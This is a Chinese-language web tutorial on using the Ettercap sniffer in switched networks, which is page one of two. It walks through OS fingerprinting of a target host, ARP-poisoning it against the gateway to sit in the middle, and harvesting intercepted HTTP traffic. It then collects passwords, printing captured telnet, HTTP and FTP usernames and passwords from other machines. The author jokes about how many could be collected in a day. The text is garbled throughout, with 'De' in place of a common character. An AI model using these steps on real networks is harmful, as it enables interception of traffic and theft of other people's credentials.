首页   Vista新闻   Vista应用   Vista技巧   Vista下载   Vista行情   Vista桌面主题   各种下载
Vista探索者
Vista探索者首页>Vista新闻>Vista最新消息> Ettercap-交换环境下的嗅探器使用方法
  • 进入探索者首页
  • Ettercap-交换环境下的嗅探器使用方法
    来源:Net作者:Net 发布时间:2008-04-20 阅读次数


    -L --logtofile 记录所有数据到指定位置
    -k --newcert 创建一个新DeCERT文件,用以进行HTTPS攻击
    -F --filter 从指定文件列加载过滤规则
    -f --fingerprint <host> 指定主机DeOS判别,采用De是nmapDe数据库,所以准确性得到保障,不过也有无法辨别De时候.
    -t --linktype 判断自己处在什么样De网络环境中,交换或是HUB

    实战篇
    210.197.248.192是确定在线De主机,先判断它操作系统
    [root@CIEL root]# ettercap -Nf 218.197.248.192
    ettercap 0.6.0 (c) 2001 ALoR & NaGA
    Your IP: 218.197.248.226 with MAC: 00:00:E8:7B:CA:4E on Iface: eth0
    Fingerprinting 218.197.248.192...
    Operating System:
    Windows NT 5 Beta2 or Beta3
    Windows Me or Windows 2000 RC1 through final release
    MS Windows2000 Professional RC1/W2K Advance Server Beta3
    Windows Millenium Edition v4.90.3000

    现在小试牛刀,看看对方正在做什么
    [root@CIEL root]# ettercap -Nza 218.197.248.192 218.197.248.254 MAC1 MAC2
    这里218.197.248.254是网关.这样,我们就是中间人了,它与外网所有数据都会在我们这里流过.不过被嗅探机器De内网数据交换我们将看不到
    下面是截取到De2段典型DeHTTP交互数据,从第一段可以看出客户正在看De网页,脚本,浏览器语言以及客户De操作系统等信息.从第2段可以看出主机Debannner等等,都是网站De基本资料
    GET /pcedu/script/title_edu.js HTTP/1.1.
    Accept: */*.
    Referer: http://wwwb.pconline.com.cn/pcedu/soft/doc/nt/10308.htm.
    Accept-Language: zh-cn.
    Accept-Encoding: gzip, deflate.
    If-Modified-Since: Mon, 09 Sep 2002 09:18:53 GMT.
    If-None-Match: "6f67c-2d5-3d7c677d".
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt).
    Host: wwwb.pconline.com.cn.
    Connection: Keep-Alive.

    HTTP/1.1 200 OK.
    Date: Sat, 01 Mar 2003 08:25:37 GMT.
    Server: Apache/1.3.20 (Unix) PHP/4.1.2 mod_ssl/2.8.4 OpenSSL/0.9.6a.
    X-Powered-By: PHP/4.1.2.
    Keep-Alive: timeout=15, max=100.
    Connection: Keep-Alive.
    Transfer-Encoding: chunked.
    Content-Type: text/html.

    当然,它还可以记下很多网页内容,全是HTML源代码,你可以抓下来,用HTM后缀保存,再用浏览器打开,好了,你看到De是什么,别人看到De就是什么.不过它对中文支持不很好,所以别人看见De中文你将无法看到,另一个程序LCRZOEX就很不错,在中文终端里,可以把所有中文网页完整抓下来.

    一般黑客最感兴趣De无非是密码了,比如下面De组合,h是帮助,它会提供帮助信息
    [root@CIEL root]# ettercap -NCzs
    ettercap 0.6.0 (c) 2001 ALoR & NaGA
    Your IP: 218.197.248.226 with MAC: 00:00:E8:7B:CA:4E on Iface: eth0
    Resolving 1 hostnames...
    Press 'h' for help...
    Sniffing (IP based): ANY:0 <--> ANY:0
    TCP packets only... (default)
    Collecting passwords...
    [qQ] - quit
    [lL] - log all trafic to file(s)
    space - stop/cont sniffing

    15:52:51 218.197.248.21:1027 <--> 61.114.4.41:23 telnet
    USER: root
    PASS: root

    15:54:53 218.197.248.46:1041 <--> 61.135.132.99:80 http
    USER:dalin
    PASS:7895865
    http://www.sohu.com/

    16:13:14 218.197.248.192:2278 <--> 218.197.249.172:21 ftp
    USER: CshjPASS: 123456如果你输入lL,系统在/ROOT下会自动生成“20030301-Collected-passwords.log",里面会记录下所有能嗅探到De密码,看来TELNET,HTTP,FTP密码都不能逃过,这些记录简洁明了,
    在机器上挂一天,不知道可以记录多少了:)

    上一篇: 防黑主要是日常维护的5个步骤总结  
    下一篇: Windows Vista中如何用闪存保护资料

    共2页: 上一页 [1] 2 下一页
    关注此文读者还看过
    • · 防黑主要是日常维护的5个步骤总结
      · Windows Vista中如何用闪存保护资料
      · 用U盘绕过登录密码进入Windows XP系统
      · N种方法教你如何进入有密码的WindowsXP系
      · 一秒识破自己机器里是否有QQ木马的存在
      · 小心三类危险的TXT文件
    最新更新
    • · 防黑主要是日常维护的5个步骤总结
      · Windows Vista中如何用闪存保护资料
      · 用U盘绕过登录密码进入Windows XP系统
      · N种方法教你如何进入有密码的WindowsXP系
      · 一秒识破自己机器里是否有QQ木马的存在
      · 小心三类危险的TXT文件
    本站推荐
    网站精华
      Windows Vista中如何用闪存保护资料
    Windows Vi
      防黑主要是日常维护的5个步骤总结
    防黑主要是
      用U盘绕过登录密码进入Windows XP系统
    用U盘绕过
    • ·技嘉也要推9英寸便携电脑 6月
    • ·苹果MBA轻薄本将成少数中国用
    • ·富士通推三款45纳米新本 主打
    • ·100美元本新进展 微软将为其开
    • ·11英寸宽屏!ThinkPad X200本
    • ·华硕M51强势登陆 靓音把你的耳
    文章关注度排行
    ·08年最受期待的PC游戏大作全预览6
    ·08年最受期待的PC游戏大作全预览5
    ·08年最受期待的PC游戏大作全预览3
    ·08年最受期待的PC游戏大作全预览9
    · 强!彻底搞定 Mac OS X 10.5 Leopard 可
    ·08年最受期待的PC游戏大作全预览2
    ·08年最受期待的PC游戏大作全预览8
    ·07杀软安全报告:微软第1 赛门铁克第2
    ·技嘉也要推9英寸便携电脑 6月正式公布
    · 一次性激活被破解,微软强化Windows Vis
    热点推荐
      Windows Vista中如何用闪存保护资料
    Windows Vista中如何
      防黑主要是日常维护的5个步骤总结
    防黑主要是日常维护的
      用U盘绕过登录密码进入Windows XP系统
    用U盘绕过登录密码进
      N种方法教你如何进入有密码的WindowsXP系统
    N种方法教你如何进入
      一秒识破自己机器里是否有QQ木马的存在
    一秒识破自己机器里是
      小心三类危险的TXT文件
    小心三类危险的TXT文
    vista探索者
    ©2006 Microsoft and its suppliers. 保留所有权利。 使用条款 广告服务 隐私声明 反垃圾邮件策略
    探索者ICP证B2-20030003号